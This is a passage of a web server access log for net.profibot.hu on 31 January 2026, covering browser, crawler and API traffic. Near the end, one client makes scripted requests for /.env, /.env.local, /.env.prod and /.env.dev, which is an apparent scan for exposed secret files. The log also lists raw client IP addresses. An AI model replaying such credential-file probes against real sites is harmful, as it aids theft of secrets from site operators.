(Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:21:00 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:21:00 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:01 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:22:01 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:16 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:22:16 +0000] - 200 200 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:17 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:22:17 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 37.76.43.179] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:18 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-7pxQYCJT.css" [Client 37.76.43.179] [Length 543672] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:21 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 37.76.43.179] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:22 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 37.76.43.179] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:22 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 37.76.43.179] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:22 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/apple-touch-icon.png" [Client 37.76.43.179] [Length 16709] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:22 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-gE2qX1Ef.js" [Client 37.76.43.179] [Length 2475] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:22:22 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 37.76.43.179] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:22 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-swCRRsQW.css" [Client 37.76.43.179] [Length 28] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:22 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-text-horizontal-grey.png" [Client 37.76.43.179] [Length 22203] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:22 +0000] - 200 200 - GET https net.profibot.hu "/images/favicons/android-chrome-192x192.png" [Client 37.76.43.179] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:31 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 37.76.43.179] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:22:52 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 44.201.8.91] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "okhttp/5.3.0" "-" +[31/Jan/2026:10:22:52 +0000] - 200 200 - GET https net.profibot.hu "/favicon.ico" [Client 44.201.8.91] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "okhttp/5.3.0" "-" +[31/Jan/2026:10:22:52 +0000] - 200 200 - GET https net.profibot.hu "/favicon.png" [Client 44.201.8.91] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "okhttp/5.3.0" "-" +[31/Jan/2026:10:22:52 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/apple-touch-icon.png" [Client 44.201.8.91] [Length 16709] [Gzip -] [Sent-to 127.17.0.1] "okhttp/5.3.0" "-" +[31/Jan/2026:10:22:53 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 44.201.8.91] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "okhttp/5.3.0" "-" +[31/Jan/2026:10:22:53 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-16x16.png" [Client 44.201.8.91] [Length 1512] [Gzip -] [Sent-to 127.17.0.1] "okhttp/5.3.0" "-" +[31/Jan/2026:10:22:53 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/safari-pinned-tab.svg" [Client 44.201.8.91] [Length 5718] [Gzip -] [Sent-to 127.17.0.1] "okhttp/5.3.0" "-" +[31/Jan/2026:10:22:53 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 44.201.8.91] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "okhttp/5.3.0" "-" +[31/Jan/2026:10:23:05 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 44.201.8.91] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "-" +[31/Jan/2026:10:23:05 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 44.201.8.91] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:23:06 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-7pxQYCJT.css" [Client 44.201.8.91] [Length 543672] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:23:06 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 44.201.8.91] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:23:07 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 44.201.8.91] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:23:07 +0000] - 200 200 - GET https net.profibot.hu "/favicon.ico" [Client 44.201.8.91] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:23:07 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/apple-touch-icon.png" [Client 44.201.8.91] [Length 16709] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:23:07 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 44.201.8.91] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:23:07 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-16x16.png" [Client 44.201.8.91] [Length 1512] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:23:07 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/safari-pinned-tab.svg" [Client 44.201.8.91] [Length 5718] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:23:07 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 44.201.8.91] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:25:35 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 98.88.137.2] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "-" "-" +[31/Jan/2026:10:28:19 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 37.76.43.179] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:28:34 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 37.76.43.179] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:29:01 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 37.76.43.179] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:31:01 +0000] - - 301 - GET http net.profibot.hu "/" [Client 91.231.89.34] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[31/Jan/2026:10:39:13 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 104.252.191.176] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:39:14 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 104.164.126.160] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:39:15 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 104.164.126.160] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:39:18 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 104.164.126.160] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:39:20 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 104.164.126.160] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:58:30 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 34.248.137.227] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" +[31/Jan/2026:10:58:30 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 34.248.137.227] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:58:31 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 34.248.137.227] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:58:31 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-7pxQYCJT.css" [Client 34.248.137.227] [Length 543672] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:58:32 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 34.248.137.227] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:58:32 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 34.248.137.227] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:58:32 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 34.248.137.227] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:58:32 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-gE2qX1Ef.js" [Client 34.248.137.227] [Length 2475] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:58:32 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-swCRRsQW.css" [Client 34.248.137.227] [Length 28] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:58:32 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 34.248.137.227] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:58:32 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-text-horizontal-grey.png" [Client 34.248.137.227] [Length 22203] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:58:32 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 34.248.137.227] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36" "-" +[31/Jan/2026:10:58:33 +0000] - 200 200 - HEAD https net.profibot.hu "/favicon.ico" [Client 34.248.137.227] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36" "-" +[31/Jan/2026:10:58:33 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 34.248.137.227] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36" "-" +[31/Jan/2026:11:09:47 +0000] - - 301 - GET http net.profibot.hu "/" [Client 35.87.112.248] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582" "-" +[31/Jan/2026:11:09:47 +0000] - - 301 - GET http net.profibot.hu "/" [Client 35.87.112.248] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1" "-" +[31/Jan/2026:11:09:47 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 35.87.112.248] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582" "http://net.profibot.hu" +[31/Jan/2026:11:09:47 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 35.87.112.248] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1" "http://net.profibot.hu" +[31/Jan/2026:11:11:51 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 104.252.191.159] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[31/Jan/2026:11:11:53 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 104.164.173.9] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" "-" +[31/Jan/2026:11:12:07 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 104.164.173.9] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[31/Jan/2026:11:12:28 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 104.164.173.9] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[31/Jan/2026:11:12:29 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 104.164.173.9] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[31/Jan/2026:11:19:58 +0000] - 200 200 - HEAD https net.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:11:19:58 +0000] - 200 200 - GET https net.profibot.hu "/.env" [Client 104.244.74.39] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:11:19:58 +0000] - 200 200 - HEAD https net.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:11:19:58 +0000] - 200 200 - GET https net.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:11:19:58 +0000] - 200 200 - HEAD https net.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:11:19:58 +0000] - 200 200 - GET https net.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:11:19:58 +0000] - 200 200 - HEAD https net.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:11:19:58 +0000] - 200 200 - GET https net.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:11:31:41 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 149.57.180.27] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[31/Jan/2026:11:35:40 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 52.42.39.195] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Safari/537.36 Edge/18.19582" "-" +[31/Jan/2026:11:35:40 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 52.42.39.195] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Safari/537.36 Edge/18.19582" "https://net.profibot.hu/" +[31/Jan/2026:11:35:41 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-7pxQYCJT.css" [Client 52.42.39.195] [Length 543672] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Safari/537.36 Edge/18.19582" "https://net.profibot.hu/" +[31/Jan/2026:11:35:41 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 52.42.39.195] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Safari/537.36 Edge/18.19582" "https://net.profibot.hu/" +[31/Jan/2026:11:35:42 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 52.42.39.195] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Safari/537.36 Edge/18.19582" "https://net.profibot.hu/" +[31/Jan/2026:11:35:42 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 52.42.39.195] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Safari/537.36 Edge/18.19582" "https://net.profibot.hu/" +[31/Jan/2026:11:35:43 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-gE2qX1Ef.js" [Client 52.42.39.195] [Length 2475] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Safari/537.36 Edge/18.19582" "-" +[31/Jan/2026:11:35:43 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-swCRRsQW.css" [Client 52.42.39.195] [Length 28] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Safari/537.36 Edge/18.19582" "https://net.profibot.hu/" +[31/Jan/2026:11:35:45 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 52.42.39.195] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "-" +[31/Jan/2026:11:35:45 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 52.42.39.195] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://net.profibot.hu/" +[31/Jan/2026:11:35:46 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-7pxQYCJT.css" [Client 52.42.39.195] [Length 543672] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://net.profibot.hu/" +[31/Jan/2026:11:35:46 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 52.42.39.195] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://net.profibot.hu/" +[31/Jan/2026:11:35:48 +0000] - 200 200 - 